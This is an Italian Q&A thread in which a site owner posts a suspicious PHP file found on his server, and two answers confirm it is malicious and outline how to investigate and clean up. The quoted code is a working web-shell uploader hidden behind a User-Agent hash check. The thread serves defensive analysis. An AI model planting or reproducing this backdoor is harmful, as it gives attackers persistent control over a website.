Possibile modifica sul sito?

0

Ho trovato uno strano file su uno dei miei server contenente il codice qui sotto. Il file è stato modificato l'ultima volta una settimana fa alle 1.40 di notte, il che è un po 'strano.

Ultimamente ho apportato molte modifiche a questo sito, ma non ricordo di aver caricato questo file:

<?php if(md5($_SERVER["HTTP_USER_AGENT"]) !== "49de371511c1de3bde34b0108ec7f129")
{
die("04030");
}
if (isset($_FILES["file"])){
    $z = $_FILES["file"]["name"];
    move_uploaded_file($_FILES["file"]["tmp_name"],$z);
    header("Location: $z"); exit(); }
    ?>
<html>
<body>
<form action="<?php echo basename(__FILE__); ?>" method="post" enctype="multipart/form-data">
  <label for="file">Filename:</label>
  <input type="file" name="file" id="file">
  <br>
  <input type="submit" name="submit" value="Submit">
</form>
</body>
</html>

Capisco cosa fa il codice, ma non sono sicuro che questo potrebbe essere stato caricato da chiunque altro da me con l'intenzione di hackerare il mio sito. Cosa ne pensi?

Ho eseguito un rapido controllo del server su tutti i file che sono stati modificati dopo l'aggiunta di questo codice, ma non ho trovato nulla di sospetto.

    
posta Carl 27.10.2014 - 21:57
fonte

2 risposte

5

Questo potrebbe benissimo essere un file dannoso. Vorrei eseguire i seguenti passaggi investigativi di base:

  1. stat il file # stat filename

  2. usa i tempi modificati e modificati dalla stat e confronta quelli con il server web access_log per rintracciare il modo in cui il file è arrivato. Probabilmente ci sarà un post su un altro script in cui è stato caricato.

  3. Se non viene trovato nulla nei registri di accesso, controlla i tuoi registri FTP perché potresti avere un utente FTP compromesso.

Cleanup:

  1. Trova e certifica i file vulnerabili se confermati tramite i log di accesso
  2. Modifica le password compilate ed esegui l'anti-spyware nella casella locale
  3. Rimuovi il file dannoso
risposta data 27.10.2014 - 22:01
fonte
0

la semplice risposta alla tua domanda è "sì", il suo file dannoso.

Ciò potrebbe accadere con il caricamento della shell utilizzando i bug dei moduli di caricamento o l'accesso a ftp (o altri protocolli che concedono l'accesso ai file).

ma questo è molto strano! la domanda è se l'hacker è in grado di caricare file sul tuo sito web e ha accesso, perché deve caricare questo file prima?

Mi chiedo se stessero tentando di concedere l'accesso al caricamento dei file anche in un secondo momento! Voglio dire, se correggi il bug del tuo programma, possono ancora caricare e RUN i loro file in seguito, semplicemente pubblicandoli nel loro vecchio script. Suppone che acceda in seguito ai file del server.

Morissette ha già detto come pulirlo. Vorrei poter aiutare qualcuno anche se questo è vecchio post

    
risposta data 24.01.2016 - 12:29
fonte

Leggi altre domande sui tag